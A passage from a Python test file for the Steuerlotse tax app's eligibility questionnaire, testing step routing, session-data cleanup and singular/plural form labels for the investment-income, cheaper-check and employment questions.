                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',}
        # One user -> the singular ngettext variant of the choice labels is expected.
        expected_number_of_users = 1
        expected_choices = [('yes', ngettext('form.eligibility.minimal_investment_income.yes', 'form.eligibility.minimal_investment_income.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.minimal_investment_income.no', 'form.eligibility.minimal_investment_income.no', num=expected_number_of_users))]
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()
            self.assertEqual(expected_choices, step.render_info.form.minimal_investment_income_eligibility.choices)
class TestTaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """Tests for the failure page shown when untaxed investment income makes the user ineligible."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        # Keep the request context fixture alive for the duration of each test.
        self.req = test_request_context

    def test_handle_sets_correct_prev_url(self):
        """After handle(), the back link must target the taxed-investment-income decision step."""
        render_info = TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
        failure_step = TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep(
            endpoint='eligibility', render_info=render_info)
        expected_prev_url = failure_step.url_for_step(
            TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
        failure_step.handle()
        self.assertEqual(expected_prev_url, failure_step.render_info.prev_url)
class TestTaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the "was the investment income already taxed?" step.

    Verifies routing (yes -> cheaper-check, no -> failure page), error
    propagation, previous-step resolution, and session-data pruning.
    """
    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Pytest autouse fixture: expose the Flask app to every test method.
        self.app = app
    def setUp(self):
        # Valid data for a single user with investment income above the
        # minimal threshold, i.e. the prerequisite for reaching this step.
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'no',
                                     'pension_eligibility': 'yes',
                                     'investment_income_eligibility': 'yes',
                                     'minimal_investment_income_eligibility': 'no'}
    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'taxed_investment_income_eligibility': 'yes'}))
            expected_url = step.url_for_step(CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)
    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'taxed_investment_income_eligibility': 'no'}))
            # Untaxed investment income -> user is ineligible, show failure page.
            expected_url = step.url_for_step(TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)
    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)
    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        # Force validation of the preceding steps' data to fail.
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'taxed_investment_income_eligibility': 'yes'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)
    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no'}
        # An unknown key must be stripped from the stored session data.
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        # Only keys relevant up to the taxed-investment-income question survive.
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no',
                               'separated_lived_together_eligibility': 'no',
                               'separated_joint_taxes_eligibility': 'no',
                               'user_a_has_elster_account_eligibility': 'no',
                               'user_b_has_elster_account_eligibility': 'no',
                               'joint_taxes_eligibility': 'no',
                               'alimony_eligibility': 'no',
                               'pension_eligibility': 'yes',
                               'investment_income_eligibility': 'no',
                               'minimal_investment_income_eligibility': 'yes',
                               'taxed_investment_income_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestCheaperCheckEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """Tests for the failure page shown when requesting the cheaper check makes the user ineligible."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        # Keep the request context fixture alive for the duration of each test.
        self.req = test_request_context

    def test_handle_sets_correct_prev_url(self):
        """After handle(), the back link must target the cheaper-check decision step."""
        render_info = CheaperCheckEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
        failure_step = CheaperCheckEligibilityFailureDisplaySteuerlotseStep(
            endpoint='eligibility', render_info=render_info)
        expected_prev_url = failure_step.url_for_step(
            CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name)
        failure_step.handle()
        self.assertEqual(expected_prev_url, failure_step.render_info.prev_url)
class TestCheaperCheckDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the 'cheaper check' yes/no decision step of the eligibility flow.

    Covers next/prev URL routing, session-data validation/cleanup on GET, and the
    single- vs multiple-user wording of the form choices.
    """

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Bridge the pytest `app` fixture into this unittest-style class so
        # every test can open request contexts on it.
        self.app = app

    def setUp(self):
        # Session data representing a valid answer path up to (but not
        # including) the cheaper-check question.
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'no',
                                     'pension_eligibility': 'yes',
                                     'investment_income_eligibility': 'yes',
                                     'minimal_investment_income_eligibility': 'no',
                                     'taxed_investment_income_eligibility': 'yes'}

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        """Answering 'no' routes forward to the employment decision step."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'cheaper_check_eligibility': 'no'}))
            expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        """Answering 'yes' routes to the cheaper-check failure display step."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'cheaper_check_eligibility': 'yes'}))
            expected_url = step.url_for_step(CheaperCheckEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        """On GET, prev_url points back to the taxed-investment-income step."""
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        """Missing prerequisite answers surface as IncorrectEligibilityData."""
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'cheaper_check_eligibility': 'no'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        """Unknown keys are stripped from the stored session data on GET."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no', }
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        """Session data that is already valid for this step stays untouched."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no', }

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        """From a full session, only the keys relevant up to this step survive."""
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no',
                               'separated_lived_together_eligibility': 'no',
                               'separated_joint_taxes_eligibility': 'no',
                               'user_a_has_elster_account_eligibility': 'no',
                               'user_b_has_elster_account_eligibility': 'no',
                               'joint_taxes_eligibility': 'no',
                               'alimony_eligibility': 'no',
                               'pension_eligibility': 'yes',
                               'investment_income_eligibility': 'no',
                               'minimal_investment_income_eligibility': 'yes',
                               'taxed_investment_income_eligibility': 'no',
                               'cheaper_check_eligibility': 'no', }

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_multiple_users_then_show_multiple_text(self):
        """Married joint-taxes data (two users) selects the plural choice labels."""
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no'}
        expected_number_of_users = 2
        expected_choices = [('yes', ngettext('form.eligibility.cheaper_check_eligibility.yes', 'form.eligibility.cheaper_check_eligibility.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.cheaper_check_eligibility.no', 'form.eligibility.cheaper_check_eligibility.no', num=expected_number_of_users))]

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            # _pre_handle is enough to build the form; full handle() not needed here.
            step._pre_handle()

            self.assertEqual(expected_choices, step.render_info.form.cheaper_check_eligibility.choices)

    def test_if_single_user_then_show_single_text(self):
        """Single-user data selects the singular choice labels."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no'}
        expected_number_of_users = 1
        expected_choices = [('yes', ngettext('form.eligibility.cheaper_check_eligibility.yes', 'form.eligibility.cheaper_check_eligibility.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.cheaper_check_eligibility.no', 'form.eligibility.cheaper_check_eligibility.no', num=expected_number_of_users))]

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()

            self.assertEqual(expected_choices, step.render_info.form.cheaper_check_eligibility.choices)
class TestEmploymentDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the employment-income yes/no decision step of the eligibility flow.

    Checks forward routing for both answers, the three possible previous steps
    (cheaper-check, minimal-investment, investment-income) depending on earlier
    answers, session cleanup on GET, and singular/plural choice labels.
    """

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Bridge the pytest `app` fixture into this unittest-style class.
        self.app = app

    def setUp(self):
        # Valid answer path up to (but not including) the employment question.
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'no',
                                     'pension_eligibility': 'yes',
                                     'investment_income_eligibility': 'yes',
                                     'minimal_investment_income_eligibility': 'no',
                                     'taxed_investment_income_eligibility': 'yes',
                                     'cheaper_check_eligibility': 'no'}

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        """Answering 'no' routes forward to the other-income decision step."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'employment_income_eligibility': 'no'}))
            expected_url = step.url_for_step(IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        """Answering 'yes' routes to the marginal-employment follow-up question."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'employment_income_eligibility': 'yes'}))
            expected_url = step.url_for_step(MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_incomes_but_no_cheaper_check_session_data_correct_then_set_prev_input_step_correctly(self):
        """With taxed investment income and cheaper_check answered, prev is the cheaper-check step."""
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_incomes_but_minimal_investment_session_data_correct_then_set_prev_input_step_correctly(self):
        """With only minimal investment income, prev is the minimal-investment step."""
        alternative_data = {**self.correct_session_data.copy(), **{'minimal_investment_income_eligibility': 'yes'}}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_no_incomes_session_data_correct_then_set_prev_input_step_correctly(self):
        """With no investment income at all, prev is the investment-income step."""
        alternative_data = {**self.correct_session_data.copy(), **{'investment_income_eligibility': 'no'}}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        """Missing prerequisite answers surface as IncorrectEligibilityData."""
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'employment_income_eligibility': 'no'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        """Unknown keys are stripped from the stored session data on GET."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no',
                        'employment_income_eligibility': 'no', }
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        """Session data that is already valid for this step stays untouched."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no',
                        'employment_income_eligibility': 'no', }

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        """From a full session, only the keys relevant up to this step survive."""
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no',
                               'separated_lived_together_eligibility': 'no',
                               'separated_joint_taxes_eligibility': 'no',
                               'user_a_has_elster_account_eligibility': 'no',
                               'user_b_has_elster_account_eligibility': 'no',
                               'joint_taxes_eligibility': 'no',
                               'alimony_eligibility': 'no',
                               'pension_eligibility': 'yes',
                               'investment_income_eligibility': 'no',
                               'minimal_investment_income_eligibility': 'yes',
                               'taxed_investment_income_eligibility': 'no',
                               'cheaper_check_eligibility': 'no',
                               'employment_income_eligibility': 'no', }

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_multiple_users_then_show_multiple_text(self):
        """Married joint-taxes data (two users) selects the plural choice labels."""
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no',
                        'employment_income_eligibility': 'no'}
        expected_number_of_users = 2
        expected_choices = [('yes', ngettext('form.eligibility.employment_income.yes', 'form.eligibility.employment_income.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.employment_income.no', 'form.eligibility.employment_income.no', num=expected_number_of_users))]

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            # _pre_handle is enough to build the form; full handle() not needed here.
            step._pre_handle()

            self.assertEqual(expected_choices, step.render_info.form.employment_income_eligibility.choices)

    def test_if_single_user_then_show_single_text(self):
        """Single-user data selects the singular choice labels."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no',
                        'employment_income_eligibility': 'no'}
        expected_number_of_users = 1
        expected_choices = [('yes', ngettext('form.eligibility.employment_income.yes', 'form.eligibility.employment_income.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.employment_income.no', 'form.eligibility.employment_income.no', num=expected_number_of_users))]

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()

            self.assertEqual(expected_choices, step.render_info.form.employment_income_eligibility.choices)
class TestMarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """Tests for the failure page shown when marginal-employment income disqualifies the user."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        # Keep a handle on the request context so each test runs inside one.
        self.req = test_request_context

    def test_handle_sets_correct_prev_url(self):
        """handle() must link back to the marginal-employment decision step."""
        failure_step_cls = MarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep
        step = failure_step_cls(
            endpoint='eligibility',
            render_info=failure_step_cls.prepare_render_info({}))
        expected_url = step.url_for_step(
            MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)

        step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)
class TestMarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the marginal-employment ('mini-job only?') decision step.

    Covers next/prev URL routing for both answers, the missing-prerequisites
    error, and session cleanup on GET.
    """

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Bridge the pytest `app` fixture into this unittest-style class.
        self.app = app

    def setUp(self):
        # Valid answer path including employment income 'yes', which is what
        # leads the user to this marginal-employment follow-up question.
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'no',
                                     'pension_eligibility': 'yes',
                                     'investment_income_eligibility': 'yes',
                                     'minimal_investment_income_eligibility': 'no',
                                     'taxed_investment_income_eligibility': 'yes',
                                     'cheaper_check_eligibility': 'no',
                                     'employment_income_eligibility': 'yes'}

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        """Answering 'yes' (only marginal employment) continues to other-income."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
